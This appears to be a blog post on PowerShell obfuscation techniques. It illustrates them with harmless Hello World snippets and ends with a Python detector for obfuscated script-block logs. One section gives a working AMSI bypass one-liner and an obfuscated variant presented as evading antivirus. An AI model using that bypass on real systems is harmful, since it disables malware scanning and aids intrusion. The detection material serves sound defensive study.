PowerShell Obfuscation tricks with examples

Here is a list of obfuscation techniques.

  • String encoding: This involves converting strings into a different format, such as base64 or hexadecimal, to make them harder to read and understand.
  • Command substitution: This involves using commands that generate output and assigning the output to a variable, making it difficult to determine the original command.
  • Variable renaming: This involves giving variables intentionally confusing names to make it harder to understand the code.
  • Function renaming: Similar to variable renaming, this involves giving functions intentionally confusing names to make the code harder to understand.
  • Comment removal: Removing comments from the code can make it harder to understand and follow.
  • Code concatenation: This involves breaking up code into smaller pieces and concatenating them together, making it harder to read and understand.
  • Control flow obfuscation: This involves using techniques like loop unrolling, where a loop is replaced with multiple copies of the code it contains, making it harder to understand the code’s logic.

Remember that while obfuscation can make it harder for someone to understand your code, it is not a foolproof method for hiding it. It is always possible for someone with enough knowledge and resources to reverse-engineer obfuscated code.

1. String encoding:

```powershell
$string = "Hello World"
$encodedString = [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($string))
# Output: "SGVsbG8gV29ybGQ="
```

2. Command substitution:

```powershell
$output = dir | Out-String
$command = "Get-ChildItem"
Invoke-Expression $command
# Output: The contents of the current directory
```

3. Variable renaming:

```powershell
$a = 1
$b = 2
$c = 3
$xyz = $a + $b + $c
# Output: 6
```

4. Function renaming:

```powershell
function abc {
    "Hello World"
}

abc
# Output: "Hello World"
```

5. Comment removal:

```powershell
# This is a comment
Write-Output "Hello World"

# Output: "Hello World"
```

6. Code concatenation:

```powershell
# Build the command out of fragments; the parentheses keep the fragments in one
# expression, so Invoke-Expression sees: Write-Output ("H" + "ello" + " W" + "orld")
$code = "Write-Output (`"H`" + `"ello`""
$code += " + `" W`" + `"orld`")"
Invoke-Expression $code
# Output: "Hello World"
```

7. Control flow obfuscation:

```powershell
$i = 0
$output = ""

while ($i -lt 5) {
    $output += "Hello "
    $i++
}

$output += "World"
Write-Output $output
# Output: "Hello Hello Hello Hello Hello World"
```

8. Character substitution:

```powershell
$string = "He110 W0r1d"
$charSub = $string.Replace("1", "l").Replace("0", "o")
# Output: "Hello World"
```

String encoding expanded

Here is an example of encoding and decoding using base64, base32, base16 (hexadecimal), base8 (octal), and base2 (binary):

All the bases

```powershell
# Encode
$string = "Hello World"
$bytes  = [System.Text.Encoding]::UTF8.GetBytes($string)
$base64 = [System.Convert]::ToBase64String($bytes)

# System.Convert has no ToBase32String, so RFC 4648 base32 is built by hand:
# 5-bit groups mapped onto A-Z2-7, padded with '=' up to a multiple of 8 characters
$alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ234567'
$bits = -join ($bytes | ForEach-Object { [System.Convert]::ToString($_, 2).PadLeft(8, '0') })
$bits = $bits.PadRight([int][math]::Ceiling($bits.Length / 5) * 5, '0')
$base32 = -join (0..($bits.Length / 5 - 1) | ForEach-Object {
    $alphabet[[System.Convert]::ToInt32($bits.Substring($_ * 5, 5), 2)]
})
$base32 = $base32.PadRight([int][math]::Ceiling($base32.Length / 8) * 8, '=')

# [System.Convert]::ToString($value, $base) converts a single byte, not an array,
# so the remaining bases are produced byte by byte
$base16 = -join ($bytes | ForEach-Object { [System.Convert]::ToString($_, 16).PadLeft(2, '0') })
$base8  = ($bytes | ForEach-Object { [System.Convert]::ToString($_, 8).PadLeft(3, '0') }) -join ' '
$base2  = ($bytes | ForEach-Object { [System.Convert]::ToString($_, 2).PadLeft(8, '0') }) -join ' '

# Output:
# base64: "SGVsbG8gV29ybGQ="
# base32: "JBSWY3DPEBLW64TMMQ======"
# base16: "48656c6c6f20576f726c64"
# base8:  "110 145 154 154 157 040 127 157 162 154 144"
# base2:  "01001000 01100101 01101100 01101100 01101111 00100000 01010111 01101111 01110010 01101100 01100100"

# Decode (this shows the base64 decode method only)
$decodedString = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64))
# Output: "Hello World"
```

Note that FromBase64String (System.Convert) and GetString (System.Text.Encoding) decode, while ToBase64String and GetBytes encode. System.Convert has no ToBase32String method, and its ToString(value, base) overload takes a single byte rather than a byte array, so base32 and the per-byte hexadecimal, octal and binary forms have to be assembled in a loop.

AMSI bypass FUDding!

Taking one of the original AMSI bypass methods for PowerShell and applying some of the techniques above, let's see what we can do!

Original AMSI bypass (Detected)

```powershell
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
```


Now let's try splitting up a string or two!

Let's start with "System.Management.Automation.AmsiUtils", specifically the AmsiUtils part.

By using the format operator (str{0}{1}g -f "i","n") and -Replace on a placeholder, we can bypass the AV.

iex

```powershell
[Ref].Assembly.GetType('System.Management.Automation.BBB'+'msiU{0}s' -f 'til' -Replace("BBB", "A")).GetField(('amsiI{0}tFailed' -f 'ni'),'NonPublic,Static').SetValue($null,$true)
```

Not blocked!

There are numerous ways to bypass using simple tricks like the above; have a play and get creative!
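The defender's side of the same tricks, as an added example that is not part of the original post: a small Python scorer that flags the markers of the techniques above (format-operator fragments, literal concatenation, -Replace on a placeholder, Invoke-Expression/iex, inline base64 and .Replace character substitution) in logged script text, such as the ScriptBlockText of a PowerShell script block logging event (Event ID 4104), and decodes any base64 runs so the analyst sees what the script would actually run. The sample script blocks, weights and threshold are constructed for this example, and the samples assemble only benign cmdlets.

```python
import re
import base64

# One heuristic per obfuscation trick discussed on this page: (name, pattern, weight).
# Weights and the threshold are assumed values chosen for this example.
SIGNATURES = [
    ("format operator assembling a name", re.compile(r"\{\d+\}[^'\"]*['\"]\s*-f\s", re.I), 3),
    ("literal-to-literal concatenation", re.compile(r"['\"]\s*\+\s*['\"]"), 2),
    ("-replace rewriting a fragment", re.compile(r"-replace\s*\(?\s*['\"]", re.I), 2),
    ("Invoke-Expression / iex on built text", re.compile(r"\b(invoke-expression|iex)\b", re.I), 3),
    ("inline base64 decoding", re.compile(r"FromBase64String", re.I), 2),
    ("character substitution via .Replace", re.compile(r"\.Replace\(['\"].['\"],\s*['\"].['\"]\)", re.I), 1),
]
BASE64_BLOB = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")
SUSPICIOUS_SCORE = 4

# Constructed sample script blocks (not real log data); only benign cmdlets are assembled.
SAMPLES = {
    "plain": r'Get-ChildItem -Path C:\Temp | Out-String',
    "fragmented": "Invoke-Expression (('Get-' + 'Chi{0}tem' -f 'ldI') -Replace('BBB', 'A'))",
    "encoded": "iex ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('"
               + base64.b64encode(b'Write-Output "Hello World"').decode() + "')))",
    "leet": '$s = "He110 W0r1d"; $s.Replace("1", "l").Replace("0", "o")',
}


def decode_blobs(text):
    """Decode base64-looking runs so the analyst sees the text the script would run."""
    found = []
    for blob in BASE64_BLOB.findall(text):
        try:
            decoded = base64.b64decode(blob, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue  # not real base64, or binary rather than script text
        if decoded.isprintable():
            found.append(decoded)
    return found


def analyze(script_block):
    """Score one logged script block, e.g. the ScriptBlockText of a PowerShell 4104 event."""
    hits = [(name, weight) for name, pattern, weight in SIGNATURES if pattern.search(script_block)]
    score = sum(weight for _, weight in hits)
    return {
        "score": score,
        "hits": [name for name, _ in hits],
        "decoded": decode_blobs(script_block),
        "suspicious": score >= SUSPICIOUS_SCORE,
    }
```

A single .Replace substitution scores below the threshold on its own, which is deliberate: the heuristics are meant to stack, so a command that is fragmented, reassembled and then handed to Invoke-Expression stands out while ordinary string handling does not.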

This post is licensed under CC BY 4.0 by the author.